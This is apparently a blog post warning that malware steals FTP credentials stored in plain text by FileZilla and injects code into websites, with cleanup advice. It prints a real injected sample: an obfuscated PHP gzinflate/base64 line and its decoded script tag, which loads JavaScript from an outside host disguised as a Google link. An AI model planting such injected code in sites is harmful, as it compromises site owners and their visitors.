Filezilla security hole hacking web sites

If you are using FileZilla as your FTP client, there is malware out there that will grab your FTP credentials from the Filezilla PLAIN TEXT FILE (yikes! ) and use that information to insert that malware code (indicated by the #b58b6f# type of code around a “gzinflate(base64_decode)” command. That is how your files will get attacked/compromised.
Look in your %APPDATA%/Roaming/Filezilla folder. One of the XML files in there has all your FTP web site credential (user/password/etc) in PLAIN TEXT! And the FileZilla people refuse to fix that obvious security hole.
My recommendation is :
– Change your FTP Password to your hosting
– Delete FileZilla from your computer (and you have to manually delete the folder in your APPDATA folder).
– Use another FTP secured client
Example of hacking sequence that you must clean your code from :
#c3284d#
echo(gzinflate(base64_decode(“JcwxDoAgDADAr5Du0sTR4FoUEUsZEq+ntG+4vrgjsih5mAwI3YKLveyvoMrhDMwi3CHWWvXV1GbSnjBml05PBYPVPPMYvWlBZbt9S9j3kCjFvMLQ418NLw==”)));
#/c3284d#
is transcoded to this sequence :
<!–c3284d–><script type=”text/javascript” src=”http://www.v-w-b.de/includes/ga.php?id=2″ name=”googlelink”></script><!–/c3284d–>
Cheers

extradrmtech

Since 30 years I work on Database Architecture and data migration protocols. I am also a consultant in Web content management solutions and medias protecting solutions. I am experienced web-developer with over 10 years developing PHP/MySQL, C#, VB.Net applications ranging from simple web sites to extensive web-based business applications. Besides my work, I like to work freelance only on some wordpress projects because it is relaxing and delightful CMS for me. When not working, I like to dance salsa and swing and to have fun with my little family.

You may also like...